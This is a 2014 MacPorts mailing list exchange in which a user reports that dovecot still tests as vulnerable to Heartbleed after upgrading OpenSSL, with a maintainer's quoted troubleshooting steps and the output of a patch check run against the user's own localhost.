Heartbleed: dovecot2 is still vulnerable after upgrade of OpenSSL library

Winfried Dietmayer Winfried.Dietmayer at t-online.de
Mon Apr 28 01:27:47 PDT 2014 

Hi Clemens,

> - Dovecot still has an old copy of OpenSSL embedded that it uses for
>   those places that handle the TLS connection. I think that one is
>   unlikely given that you did rebuild dovecot and that it has been
>   revbumped. Nevertheless you should be able to rule it out by
>   re-installing dovecot from the binary archives that are now
>   available on the packages server. That would give you the exact
>   binary I've been using, which wasn't vulnerable on my system.


I reinstalled dovecot from the MacPorts packages server but to no avail. The vulnerability is still there.

> - The port you're testing is not actually being served by the dovecot
>   instance we've been looking at. Please verify that you're actually
>   testing the correct dovecot instance by stopping all possible
>   dovecot servers, starting one manually using
>     $> sudo /opt/local/sbin/dovecot -F
>   and checking that it is the one listening on the port you test using
>     $> lsof -i tcp:$port

The right dovecot instance is listening on port 993.

> You could also try running another SSL-enabled service using the same
> OpenSSL version (e.g. apache2 from MacPorts) and check if that is
> vulnerable to heartbleed.

I installed ‚apache2‘ as MacPorts binary:
————
$ cardiac/10632982/cardiac-arrest.py -a -p 443 localhost | grep -i -E '(fail|not)'
————
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[PASS] localhost:443 (127.0.0.1:443) does not appear to be vulnerable to Heartbleed!

Thus, apache seems *not* to be vulnerable.

I tried several other things:
- I safe-booted the machine and the vulnerability is *gone*. Of course this is no option in real life
- I deleted ed the cache of the dynamic libraries in /var/db/dyld/ and rebooted. The vulnerability is still there.
- I build dovecot and OpenSSL from the original tarballs from their respective project sites. 
  The result is the same: dovecot is still vulnerable to the heart bleed bug.

To summerize: 
- dovecot is vulnerable on my system regardless whether the binaries are build via MacPort or via the original tarballs. 
- apache is not vulnerable using the same OpenSSL library.
- dovecot is not vulnerable if the machine is safe-booted.

This is all really weird.

Thank you so far for your help , any further help is of course much appreciated.

Regards, 
		Winfried

On 24.04.2014 at 15:01 wrote Clemens Lang <cal at macports.org>:

> Hi Winfried,
> 
>> --------
>> Apr 23 10:55:55 Winfrieds-XXXX.local dovecot[66453]: imap-login:
>> Error: dyld: loaded: /opt/local/lib/libssl.1.0.0.dylib
>> Apr 23 10:55:55 Winfrieds-XXXX.local dovecot[66453]: imap-login:
>> Error: dyld: loaded: /opt/local/lib/libcrypto.1.0.0.dylib
>> --------
> 
>> --------
>> OpenSSL 1.0.1g 7 Apr 2014
>> SSLv2 part of OpenSSL 1.0.1g 7 Apr 2014
>> SSLv3 part of OpenSSL 1.0.1g 7 Apr 2014
>> TLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
>> DTLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
>> --------
> 
> OK, so your dovecot uses the correct OpenSSL library and that library
> is a version that shouldn't be vulnerable to the heartbleed issue.
> That leaves a few other things to rule out:
> - Dovecot still has an old copy of OpenSSL embedded that it uses for
>   those places that handle the TLS connection. I think that one is
>   unlikely given that you did rebuild dovecot and that it has been
>   revbumped. Nevertheless you should be able to rule it out by
>   re-installing dovecot from the binary archives that are now
>   available on the packages server. That would give you the exact
>   binary I've been using, which wasn't vulnerable on my system.
> - The port you're testing is not actually being served by the dovecot
>   instance we've been looking at. Please verify that you're actually
>   testing the correct dovecot instance by stopping all possible
>   dovecot servers, starting one manually using
>     $> sudo /opt/local/sbin/dovecot -F
>   and checking that it is the one listening on the port you test using
>     $> lsof -i tcp:$port
> 
> You could also try running another SSL-enabled service using the same
> OpenSSL version (e.g. apache2 from MacPorts) and check if that is
> vulnerable to heartbleed.
> 
> -- 
> Clemens Lang

More information about the macports-users mailing list